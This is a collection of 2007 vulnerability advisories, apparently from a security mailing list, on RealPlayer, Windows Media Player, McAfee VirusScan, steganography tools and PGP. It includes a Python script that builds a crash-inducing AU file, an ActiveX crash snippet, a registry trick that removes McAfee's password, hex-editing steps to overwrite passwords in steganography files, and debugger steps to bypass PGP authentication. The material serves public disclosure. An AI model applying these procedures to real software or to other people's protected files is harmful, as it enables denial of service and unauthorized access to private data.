Realplayer 11 DOS attack when processing a malformed AU file on MS Vista and XP
Type : DOS attack when processing a malformed AU file. Affected : Realplayer 11 ActiveX on Win Vista and Win XP SP2 Date : 01-12-2007 Author : Adonis, Abed safehack.com Link : http://www.safehack.com/Advisory/realpdos_au.txt Disclaimer -- The information in this text is believed to be true based on experiments though it may be false. This material is presented for informational purposes ONLY. We do not accept any liability for anything anyone does with this Information. Brief History - Link : http://www.safehack.com/Advisory/realpdos_au.txt RealPlayer 11 is prone to a denial-of-service vulnerability when processing a malformed AU file. A remote attacker can exploit this issue to crash the affected application, denying service to legitimate users. The Problem --- Instructions: : : 630A87D5 894E 76 MOV DWORD PTR DS:[ESI+76],ECX : 630A87D8 1BDB SBB EBX,EBX : 630A87DA 83E3 03 AND EBX,3 : 630A87DD 83C3 08 ADD EBX,8 : 630A87E0 0FAFFB IMUL EDI,EBX : 630A87E3 D1E7 SHL EDI,1 : 630A87E5 33D2 XOR EDX,EDX : 630A87E7 F7F7 DIV EDI <- division by zero, crash : : : Registers:: : EAX ECX EDX EBX 000B ESP 07F5FE14 EBP 07F5FE24 ESI 01DE0E48 EDI EIP 630A87E7 pnen3260.630A87E7 Hex Dump: 00411000 00 00 00 00 9C CF 40 00 [EMAIL PROTECTED] 00411008 90 D3 40 00 A0 D3 40 00 [EMAIL PROTECTED] [EMAIL PROTECTED] 00411010 C0 D3 40 00 E0 D3 40 00 [EMAIL PROTECTED]@. 00411018 00 D4 40 00 10 D4 40 00 [EMAIL PROTECTED]@. 00411020 00 00 00 00 00 00 00 00 00411028 00 00 00 00 00 00 00 00 -:P.O.C.:- +- #RealPlayer 11 local/remote DoS by A.Sawan aka NtWaK0 and A.Hariri aka nophie import sys import os head = ("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"+ "\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"+ "\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"+ "\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x66\x66\x66\x00") print "[x] Windows Media Player 11 DoS by Adonis a.K.a NtWaK0 and Abed aka Nophie." try: f = open("test.au",'w') except IOError, e: print "Unable to open file ", e sys.exit(0) print "[x] File sucessfully opened for writing." try: f.write(head) except IOError, e: print "Unable to write to file ", e sys.exit(0) print "[x] File successfully written." f.close() print "[x] Open test.au with RealPlayer 11." +-. Peace to you all:all and Happy New Year full of health and Peace : +-.
DOS in Realplayer 11 ActiveX on Win Vista and Win XP SP2
+-. Affected: Realplayer 11 ActiveX on Win Vista and Win XP SP2 : Type: DOS Attack : Date: 28-11-2007 : Author : Adonis, Abed: Link: http://www.safehack.com/Advisory/realpdos.txt : +-. : +-. : Brief History \ : +---`-. GetSourceTransport() fails to handle exceptional conditions, which: leads to a DoS (Denial of Service) attack.: : GetSourceTransport() is found in rmoc3260.dll which is installed : with RealPlayer 11. : : Note: This ActiveX can be loaded by IE or any other browser. : : Successful exploitation will lead to a remote crash in IE 6/7.: : +---. : The Problem \: +-`---. RealPlayer 11 ActiveX DoS Proof-of-Concept: : : -:PoC:- : 1- Copy and past the following code into filepoc.wsf : 2- Run it by double clicking on it: ---snip---: targetFile = "C:\Windows\system32\rmoc3260.dll" prototype = "Function GetSourceTransport ( ByVal nSourceNum As Integer ) As String" memberName = "GetSourceTransport" progid = "RealAudioObjects.RealAudio" argCount = 1 arg1=32767 target.GetSourceTransport arg1 ---snip---: Registers: -- EIP 637F4A02 -> EAX 0022EC44 -> EBX 663CCB38 -> 663B7400 -> Uni: t;ft;f ECX 0022EC44 -> EDX 01536388 -> 638416B8 EDI ESI EBP 0022EC68 -> 0022EC78 ESP 0022EC3C -> Block Disassembly: -- 637F49F2JE SHORT 637F49F8 637F49F4MOV ESI,EAX 637F49F6JMP SHORT 637F49FA 637F49F8XOR ESI,ESI 637F49FALEA ECX,[EBP-24] 637F49FDCALL 6381C1F0 637F4A02MOV EDX,[ESI] <--- CRASH 637F4A04LEA EAX,[EBP-4] 637F4A07PUSH EAX 637F4A08PUSH 638427D8 637F4A0DPUSH ESI 637F4A0ECALL [EDX] 637F4A10MOV EAX,[EBP+8] 637F4A13SUB EAX,46 637F4A16JE 637F4B28 Stack Dump: -- 22EC3C 00 00 00 00 F4 EC 22 00 00 00 00 00 F4 EC 22 07 [] 22EC4C C0 6D 53 01 00 00 00 00 30 ED 22 00 00 00 00 00 [.mS.] 22EC5C 00 00 00 00 DC 9A 2B 00 00 00 00 00 78 EC 22 00 [] 22EC6C A8 C7 7F 63 47 00 00 00 FF 7F 00 00 90 EC 22 00 [...cG...] 22EC7C 8E 48 3B 66 88 63 53 01 47 00 00 00 FF 7F 00 00 [.H.f.cS.G...] : : Peace to you all:all and Happy New Year full of health and Peace : +-.
DoS in Microsoft Media Player 11 on Win XP SP2
.---. / Advisory\ -. : Affected : Microsoft Media Player 11 on Win XP SP2 : Type : DIVISION by ZERO : Result : DoS : Remote : YES : Date : 2007-08-07: Author: : Adonis, Abed : url : http://www.safehack.com/exp/mp/mplayer11.txt : -. . Disclaimer \ --`--. This material is presented for informational and educational : purposes only. We do not accept any liability for anything anyone: does with this information. So, don't shoot the messenger. : : Use a computer in a ways that ensure respect for your fellow.: -. --. Brief History \ `. A division by Zero lead to a denial of service on: Microsoft Windows Media Player version 11: : If you open a specially crafted .au file in windows Media player : you will crash the player with the following error. : : Exception number: c094 (divide by zero) : : To see if you Windows Media Player is vulnerable you can use our : .au generator coded in python, or you can download the POC file. : : : Proof-of-Concept : : : http://www.safehack.com/exp/mp/iapetus.py (python .au generator) : http://www.safehack.com/exp/mp/iapetus.au (poc file) : : If you do not have python installed you can just use the poc file: -. --. DEBUG DUMP\ `. Application exception occurred: App: C:\Program Files\Windows Media Player\wmplayer.exe (pid=4972) When: 8/7/2007 - 19:50:13.051 Exception number: c094 (divide by zero) *> System Information <* Computer Name: -- User Name: -- Terminal Session Id: 0 Number of Processors: 1 Processor Type: x86 Family 15 Model 2 Stepping 4 Windows Version: 5.1 Current Build: 2600 Service Pack: 2 Current Type: Uniprocessor Free Registered Organization: Organization Registered Owner: Name *> State Dump for Thread Id 0x838 <* eax= ebx=010a82b0 ecx= edx= esi= edi=000fe3a2 eip=748fe598 esp=01c8f0c0 ebp=01c8f154 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=0246 function: quartz 748fe581 b708 mov bh,0x8 748fe583 c1ea02 shr edx,0x2 748fe586 3bd1 cmp edx,ecx 748fe588 7702 ja quartz+0xee58c (748fe58c) 748fe58a 8bd1 mov edx,ecx 748fe58c 0fb708 movzx ecx,word ptr [eax] 748fe58f 56 pushesi 748fe590 8d740aff lea esi,[edx+ecx-0x1] 748fe594 8bc6 mov eax,esi 748fe596 33d2 xor edx,edx FAULT ->748fe598 f7f1 div ecx<- FAULT 748fe59a 8bc6 mov eax,esi 748fe59c 5e pop esi 748fe59d 2bc2 sub eax,edx 748fe59f c3 ret 748fe5a0 90 nop 748fe5a1 90 nop 748fe5a2 90 nop 748fe5a3 90 nop 748fe5a4 90 nop 748fe5a5 8bff mov edi,edi -. The Solution \ ---`-. : Wait for a patch from Microsoft : --
Bypassing Mcafee Entreprise Password Protection
Date : 03/16/2007 URL: http://homepage.mac.com/adonismac/Advisory/bypass_mcafee_entreprise_password.html Affected Product / OS = Product Name and Version: McAfee VirusScan Entreprise 8.5.0.i maybe older version too. Tested on OS: Windows XP, 2003 Bug Type Type: Bad Design Bug Results === Bypass Password Protection Bug Description === Mcafee virusscan Enterprise version allow you to lock the user interface using a password. A user write access windows registry. The password is saved in UIP under the key HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\DesktopProtection Or it can be under HKEY_LOCAL_MACHINE\SOFTWARE\Network Associates\TVD\VirusScan Entreprise\CurrentVersion If you remove the value of the UIP you will end up bypassing the password. You can replace the value if you wish too with a known value, but why bother when you can remove the password. I think this type of protection is not too secure. Proof-Of-Concept http://homepage.mac.com/adonismac/Advisory/crack_mcafee_password_protection.html Peace to you all
A Major design Bug in Camouflage 1.2.1 (latest)
A Major design Bug in Camouflage 1.2.1 (latest) Direct Link: http://homepage.mac.com/adonismac/Advisory/steg/camouflage.html Disclaimer == This material is presented for informational purposes ONLY. I do not condone or encourage vandalism or theft. I do not accept any liability for anything anyone does with this information. So, don't shoot the messenger. Remember: Use a computer in ways that ensure respect for your fellows. Author == Adonis a.K.a. NtWaK0 Abed a.K.a. NoPh0BiA Affected Product Camouflage 1.2.1 (latest). http://camouflage.unfiction.com/ Bug Type and Date = Type: Very Bad Design Date: 01/07/2007 Bug Results === Cracking encrypted (Camouflage 1.2.1) files without any bruteforce. WHY LOSING TIME ON MATH AND BRUTEFORCE WHEN YOU CAN PLAY WITH YOUR HEX EDITOR :-). Bug Description === Firstly, computer forensic investigators can take advantage of this bug to access file protected with (Camouflage 1.2.1) without the knowledge of the original password. Now it is time to check your cold cases for steganography files. You can crack (Camouflage 1.2.1) encrypted files very easy, in fact in less than two minute. The problem is similar to the bug I found in PGP last year. (Camouflage 1.2.1) leave a footprint after you stag a file. If you look at the end of your stagged file you will notice the following: http://homepage.mac.com/adonismac/Advisory/steg/camouf3.jpg So now we have identified the stagged file our next step is to access the HIDDEN messages or files without cracking the password, here is how. Proof-of-Concept (THIS WILL WORK HIDDEN FILES) == For screen capture please check http://homepage.mac.com/adonismac/Advisory/steg/camouflage.html Step 01 1. We use a file cover (carrier file) called "Adonis_Carrier_File1.jpg" 2. We will hide inside it a file called "Adonis_Hidden_File1.txt" 3. We will right click "Adonis_Hidden_File1.txt" and select camouflage 4. We will use a password "" 5. We generated the stagged file we will call it "Adonis_Camouflage_Stagged_File.jpg" http://homepage.mac.com/adonismac/Advisory/steg/camouf1.jpg Step02 NOTE: We will use different carrier and different input file to show you it will work even if you have different input and different carriers. To access the hidden file WITHOUT the original password "" we will do the followings: 1. We use a file cover (carrier file) called "Adonis_Carrier_File2.jpg" 2. We will hide inside it a file called "Adonis_Hidden_File2.txt" 3. We will right click "Adonis_Hidden_File2.txt" and select camouflage 4. We will use a password "a" 5. We generated the stagged file we will call it "Adonis_break_camouflage.jpg" 6. We will open Both pictures in a hex editor 7. We will replace as indicated in the screen capture below "Adonis_Camouflage_Stagged_File.jpg" with the one from "Adonis_break_camouflage.jpg" 8. We will Save the file. 9. We will right click "Adonis_Camouflage_Stagged_File.jpg" and select camouflage and use "a" as password. YES we overwrite the password with something we know. Simple hein !!! Now time to break camouflage. = We will open "Adonis_Camouflage_Stagged_File.jpg" and "Adonis_break_camouflage.jpg" in hex edit. We will start from the END of the file and try to locate 00 02 63 (like 10 lines from the end of the file). Once we have located the values we start REPLACING from LEFT to right starting after 00 20 63 (63 is the first letter of the password a) (Do not replace 63 it is your password = a). In this example I will replace the password with a. So I will replace F4 1B 43 with 20 20 20. http://homepage.mac.com/adonismac/Advisory/steg/camouf2.jpg To resume the password is saved starting from 00 00 20 00 (ANYTHING AFTER THIS POINT IS THE PASSWORD AND THIS CAN BE OVERWRITTEN AS YOU SEE) Testing the results === http://homepage.mac.com/adonismac/Advisory/steg/camouflage.html Peace to you all Copyright © 2007 Adonis a.K.a NtWaK0
A Major design Bug in Steganography 1.7.x, 1.8 (latest) (Updated Version)
Direct Link http://homepage.mac.com/adonismac/Advisory/steg/steganography.html A Major design Bug in Steganography 1.7.x, 1.8 (latest) Disclaimer == This material is presented for informational purposes ONLY. I do not condone or encourage vandalism or theft. I do not accept any liability for anything anyone does with this information. So, don't shoot the messenger. Remember: Use a computer in ways that ensure respect for your fellows. Author == Adonis a.K.a. NtWaK0 Abed a.K.a. NoPh0BiA Affected Product Steganography 1.7.1 and 1.8 (latest). http://www.securekit.com/hidefiles.htm Bug Type and Date = Type: Very Bad Design Date: 01/07/2007 Bug Results === Cracking encrypted (steganography application 1.7.x 1.8) files without any bruteforce. WHY LOSING TIME ON MATH AND BRUTEFORCE WHEN YOU CAN PLAY WITH YOUR HEX EDITOR :-). Bug Description === Firstly, computer forensic investigators can take advantage of this bug to access file protected with (steganography application 1.7.x 1.8) without the knowledge of the original password. Now it is time to check your cold cases for steganography files. You can crack (steganography application 1.7.x 1.8) encrypted files very easy, in fact in less than two minute. The problem is similar to the bug I found in PGP last year. (steganography application 1.7.x 1.8) leave a footprint after you stag a file. If you look at the end of your stagged file you will notice it will end with 30 00 0X FF FF. So a simple HEX search will reveal all stagged files. So now we have identified the stagged file our next step is to access the HIDDEN messages or files without cracking the password, here is how. Proof-of-Concept (THIS WILL WORK ON HIDDEN MESSAGES and HIDDEN FILES) = For screen capture please check http://homepage.mac.com/adonismac/Advisory/steg/steganography.html Step 01 1. We use a file cover (carrier file) called "picture_original.jpg" 2. We will hide inside it a message "Hello Adonis" 3. We will use a password "aa" 4. We generated the steged file we will call it "picture_with_hidden_msg.jpg" Step02 To access the hidden message WITHOUT the original password "aa" we will do the followings: 1. We will use any other picture file say "mypicture.jpg" 2. We will hide inside it a message "WHATEVER" 3. We will use a password "a" 4. We generate the steged file we will call it "mypicture_steg.jpg" 5. We will open Both pictures in a hex editor 6. We will replace the last 20 bites of " picture_with_hidden_msg.jpg" with the one from mypicture_steg.jpg 7. We will Save the picture "picture_with_hidden_msg.jpg" 8. We will open "picture_with_hidden_msg.jpg" with (steganography application 1.7.x 1.8) using "a" as password. YES we overwrite the password with something we know. Simple hein !!! Peace to you all Copyright © 2007 Adonis a.K.a NtWaK0
Cracking Steganography Application in less than ONE minute
Good day Direct Link to Advisory http://homepage.mac.com/adonismac/Advisory/steg/steganography.html Affected Product Steganography 1.7.1 and 1.8 (latest). http://www.securekit.com/hidefiles.htm Bug Type and Date = Type: Bad Design Date: 01/06/2007 Bug Results === Cracking encrypted steganorgaphy files without any bruteforce. Bug Description === You can crack steganography encrypted files very easy in fact in less than one minute. The problem is similar to the bug I found in PGP last year. First you have to identify the steged files. Steganography application leave a footprint after you stego a file. If you look at the end of your steged file you will notice it will end with 30 00 02 FF FF. So a simple HEX search will reveal all steged files. So now we have identified the steged, the next step is to access the HIDDEN message without cracking the password. Here is how Proof-of-Concept Step 01 1- We use a file cover (carrier file) called "picture_original.jpg" 2- We will hide inside it a message "Hello Adonis" 3- We will use a password "aa" 4- We generated the steged file we will call it "picture_with_hidden_msg.jpg" Step02 == To access the hidden message WITHOUT the original password "aa" we will do the followings: 1- We will use any other picture file say "mypicture.jpg" 2- We will hide inside it a message "WHATEVER" 3- We will use a password "a" 4- We generate the steged file we will call it "mypicture_steg.jpg" 5- We will open Both pictures in a hex editor 6- We will replace the last 20 bites of " picture_with_hidden_msg.jpg" with the one from mypicture_steg.jpg 7- Save picture "picture_with_hidden_msg.jpg" 8- Open it using a as password. YES we overwrite the password with something we know. Simple hein !!! Peace
RE: A Nasty Security Bug that affect PGP Virtual Disks & PGP SDA , PGP 8.x & 9.x and Truecrypt.
Firstly, we appricate truecrypt team comments but on the other hand we do not agree on some. --Adonis Comment-- I do not agree with some of truecrypt comments specially the quoted text below. What if you had created a virtual disk and give that to someone. That someone use it as his/her own disk and decided to change the password because they own the disk now (You give them to them with the pass). So they did change the passowrd, but the originator can still access that disk if he/she replace the passphrase bytes in the binary file. So I consider this an attack on data INTEGRITY and data AVAILABILITY since the legitimate user will be denied access to the disk after replacing the passphrase bytes. -- End Comment-- "In conclusion, this is not a "security bug", but design/feature. Also, to exploit the design, the adversary would have to know your password first (or have your keyfiles). That means, for example, that he would capture it using a keystroke logger. If that was the case, then all security would be practically lost on that machine." Peace
Proof of concept that PGP AUTHENTICATION CAN BE BYPASSED WITHOUT PATCHING
This to answer Mr Jon Callas (PGP CTO) and to show him the last proof-of-concept. If he did not get it we consider we have done our part to report a BIG problem in PGP unless this is some kinda of HIDDEN features. --Adonis, Abed Comments-- We do not agree with some of PGP comments. We do not know why they just see one side of the coin. What if you had created a virtual disk and give that to someone. That someone use it as his/her own disk and decided to change the password because they own the disk now (You give them to them with the pass). So they did change the passowrd, but the originator can still access that disk if he/she replace the passphrase bytes in the binary file. So I consider this an attack on data INTEGRITY and data AVAILABILITY since the legitimate user will be denied access to the disk after replacing the passphrase bytes. "why you do not want to see that your password verification can be simply bypassed, besides a reputable co. like PGP should at least put anti-debugging tweaks, or even encrypt/hide the passphrase location" To pgp, your authentication can be bypassed, even if you have created two different .sda file with two different content. the authentication can be overwritten and the file can be extracted if you use a debugger if you do not use a debugger you will be able to just bypass the authentication but without extraction. why don't you see that mr. jon? instead of bitching and stuff? why cannot you be professional and just explain fact after you do your home work with a nice debugger.? is that to much asking, I think we are talking among human and adults no?. We think Mr. Jon (PGP) should play this flash video SLOW REAL SLOW. http://www.safehack.com/Advisory/pgp/answerjon.html PGP comments: http://www.securityfocus.com/archive/1/435155 Quote from Mr Jon comments: "For completeness, I'll note that we are discussing whether we should add in a warning dialog to the passphrase change on a PGP Disk, to tell the user that an attacker who has learned an old passphrase, has an old disk and a hex editor can patch the disk so that it can be opened. On the one hand, this might be a good thing to do". So if Mr Jon does not see the problem why they are talking about adding a message box?. Why the passphrase location is not hidden? etc. I still see this as INTEGRITY and AVAILABILITY attacks on PGP. I do not think it is normal behavior of an encryption application to reveal it is passphrase location and I do not see bypassing the passphrase dialog-box as Feature either. Proof of concept that PGP AUTHENTICATION CAN BE BYPASSED WITHOUT PATCHING THE BINARY FILE EVEN. This Flash video is dedicated to Mr. Jon Callas (PGP CTO, CSO). http://www.safehack.com/Advisory/pgp/proof_of_concept_PGP_Authentication_BYPASS.html http://www.safehack.com/Advisory/pgp/proof_of_concept_PGP_Authentication_BYPASS.html We had reported that PGP Authentication can be bypassed by patching the binary file. After reading Mr. Jon Callas NON PROFESSIONAL answer, me and abed decided to show him that is not true. By using a SIMPLE Debugger PGP Authentication can be bypassed. Here is Mr Jon Callas Comments http://www.securityfocus.com/archive/1/435155 Summing up, we are disappointed that for whatever reasons, we were not contacted about this research before it was put on the web and posted on bugtraq. Had we been contacted, we could discuss this in private rather than have to air the details of this misunderstanding in a public forum. I am truly sorry for the sake of the Information Security Institute of Quebec and its staff that this complex issue has turned into a public brouhaha. We load the file in the debugger and set the break points then we start by hitting F9 we will see the password dialog we enter ANY password here. When it stop at 00409797 Hit F9 6 times You see on 00405D70 |. E8 4FFB CALL a_sda.004058C4 we hit 6 times F9 A break point should be set on 00405D70 to see this. After running the sda in olly we end up here. We hit F9 couples of time then we change ESI EDI ON 00409797 |. F3:A7 REPE CMPS DWORD PTR ES:[EDI],DWORD PTR D>; We see the stack values ECX=0002 (decimal 2.) DS:[ESI]=stack [00BBF68C]=DC3F5C82 <-- IF WE ENTER A BAD PASSWORD THESE WONT BE THE SAME ES:[EDI]=stack [00BBFF98]=DC3F5C82 EQUAL... WE JUST MAKE THEM EQUAL THEN CONTINUE THE QUEST. AT THIS POINT PGP Authentication is bypassed. I hope that help Mr. Jon (PGP) seeing the problem. Again Mr Jon Bitching does not help you fixing your products. -- End Comment-- Peace
A Nasty Security Bug that affect PGP Virtual Disks & PGP SDA , PGP 8.x & 9.x and Truecrypt.
A Nasty Security Bug that affect PGP Virtual Disks & PGP SDA , PGP 8.x & 9.x and Truecrypt. Affected Products: * PGP 8.x PGP 9.x maybe older version too * Truecrypt 4.2 maybe older version too // Full detail can be found here // <> http://www.safehack.com/Advisory/pgp/PGPcrack.html <> http://www.safehack.com/Advisory/truecrypt/truecrypt.html If you would like to watch the flash video check the following links. <> pgpdiskvideo.html Tested on version 8.1 and the latest 9.02 http://www.safehack.com/Advisory/pgp/pgpdiskvideo.html <> truecrypt.html Tested on the latest version truecrypt-4.2.zip http://www.safehack.com/Advisory/truecrypt/truecrypt.html Note If you put stuff inside your test file you need to use a debugger to extract the data. If you just follow the video you will see how it is done without a debugger and an empty file. The How? I Was able to ACCESS PGP encrypted disks if the disk was encrypted with a passphrase or a public Key. This method will work on both scary huh :-) You need the followings tools: -- 1. A Brain 2. A Hex Editor. 3. PGP 8.1 Entreprise or Personal. You can use 9.x too. My feeling is this method will work on older versions too, because it is a design flaw in PGP application not in PGP algorithm. 4. A Debugger. Not needed if you wana backdoor pgp (olldbg) During my tests I have found that PGP virtual DISK and PGP Self Extractable file SDA have a SERIOUS security bug. I would rather say a design bug. PGP disk or SDA can be cracked in 3 major steps: 1. Editing PGP protected file using a hex editor. (Patching the passphrase). 2. Tracing PGP protected file using a debugger. (You need a lot of time and coding/cracking experience) 3. Patching the responsible bytes. I have spend only couples of days debugging but surely a lot more time is needed. But once the process is understood it is question of finding the right bytes and patching them. Conclusions for 6 days debugging and testing: = * PGP Virtual Disk and PGP and PGP SDA has a serious bug. I have tested PGP 8.1 Entreprise. Other version many be vulnerable too. * PGP corporation made the same error in PGP 9.x you can bypass the passphrase Dialog box same way. * PGP corporation could avoid this type of issue by calculation the HASH for the encrypted file. They should make it harder to locate the passphrase. * PGP Virtual Disk First Level protection bypass. Passphrase bypass. (Working 100%) * PGP Virtual Disk Backdooring (Working 100%). * PGP Virtual Disk Mounting / Adding Users / Deleting Users / Re-Encrypting Disk (Working 100%). * PGP Virtual Disk Mounting and Data Access (Working 40%. Need more time to debug). * PGP SDA Passphrase bypass. (Working 100%) * PGP SDA Extraction is possible IF the input file is the same (Working 100% Patching using a Debugger) * PGP SDA Extraction is possible of any file (Working 80%. Need more time to debug) * OTHER AFFECT PRODUCTS: o iOPUS Secure Email Attachments (SEA) V1.0 o Truecrypt Free open-source disk encryption software 4.2 * WINZIP was not affected. 1- In winzip you do not know where is the password location 2- If you change one bit your file wont work * I DO NOT HAVE more time to test, but I am sure many smart dudes out their would love to play some more. * To do: Build an application to mount PGP Virtual disk using this bug. * To do: Build an application to extract PGP SDA files using this bug. After spending 6 days on this I had decided to stop. But I will be doing more testing when I have some free time. You are free to do your own tests. If you wish to share your own test or finding with me please feel free to contact me at [EMAIL PROTECTED] PGP SDA authentication method = Let's say you created a text file and wrote inside it "aa", then created an SDA. IF you hex edit the output exe, you will notice at the very buttom of the file some bytes seperated by 803E. Ex: E7 93 A0 90 E9 62 D1 21 803E A1 50 AF 5F 6F 9E FE D6 Analysing the bytes carefully, you will notice that 803E is the value used for a loop. The loop starts at 0040590D. Further analysis showed that the bytes right before 803E, are used for extraction and authentication. Authentication is done in the following way: When some enters a passphrase a series of instructions is executed against the bytes right before 803E, to be exact in the function at address 00404E8F. This function generates a series of bytes which are compared later on to the bytes AFTER 803E. If they match you are granted auth. The auth. byte comarison is done in the following instruction: 00409797 |. F3:A7 REPE CMPS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI